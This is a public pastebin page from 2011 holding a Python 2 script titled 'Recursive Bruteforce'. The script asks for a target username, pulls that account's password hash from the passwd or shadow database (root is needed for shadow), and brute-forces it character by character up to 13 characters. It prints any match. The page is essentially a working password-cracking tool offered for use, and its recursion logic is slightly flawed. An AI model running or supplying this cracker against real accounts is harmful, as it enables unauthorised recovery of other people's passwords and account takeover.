Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

ki113d: Recursive Bruteforce

By: a guest on Sep 7th, 2011  |  syntax: Python  |  size: 2.22 KB  |  hits: 44  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/usr/bin/python
  2. import crypt, getpass, pwd, spwd, sys, string
  3.  
  4. # Integer values for most characters
  5. easyRange = [32,33,36,42,43] + range(48, 58) + range(65, 91) + range(97, 123)
  6. # Integer values for all characters.
  7. fullRange = range(32,127)
  8.  
  9. def brute(username):
  10.  
  11.     def checkPassword(password):
  12.         if crypt.crypt(password, cryptedpasswd) == cryptedpasswd:
  13.             print "Match [" + password + "]"
  14.                    
  15.     def recurse(width, position, baseString):
  16.         #current position
  17.         for char in easyRange:
  18.             if (position < width - 1):
  19.                 recurse(width, position + 1, baseString + "%c" % char)
  20.                 checkPassword(baseString + "%c" % char)
  21.  
  22.     # Retrieve the encrypted password for 'username'
  23.     print '\n\n{0}'.format('Searching database for "%s".\n' % username)
  24.    
  25.     try:
  26.         cryptedpasswd = pwd.getpwnam(username)[1]
  27.        
  28.     except:
  29.         print '{0}\n{1}'.format('User "%s" doesn\'t seem to exist.' % username,\
  30.         'Please make sure you have the right username and try again.')
  31.         sys.exit()
  32.  
  33.     if cryptedpasswd:
  34.         # Check if the encrypted password is a shadow password
  35.         if cryptedpasswd == 'x' or cryptedpasswd == '*':
  36.             print '{0}\n{1}\n'.format('"%s\'s" password seems to be in the shadow database.' % username,
  37.             'Searching shadow database for "%s".' % username)
  38.            
  39.             try:
  40.                 cryptedpasswd = spwd.getspnam(username)[1]
  41.                
  42.             except:
  43.                 print '{0}\n\n{1}'.format('The account you have specified has a shadow password.',\
  44.                 'Please try again with root privileges.')
  45.                 sys.exit()
  46.  
  47.         print '\n{0:*^80}\n{1:*^80}\n\n'.format('[+] Encrypted password found! [+]',\
  48.         '[~] Starting the bruteforce engine. [~]')
  49.        
  50.         maxChars = 13
  51.         for baseWidth in range(1, maxChars + 1):
  52.             print '{0}{1}{2}'.format('Checking all possible passwords with the width of [',\
  53.             baseWidth, ']')
  54.  
  55.             recurse(baseWidth, 0, "")
  56.  
  57. if __name__ == '__main__':
  58.     print 'Please enter the name of the user you would like to target.'
  59.     brute(raw_input('Username: '))
create a new version of this paste RAW Paste Data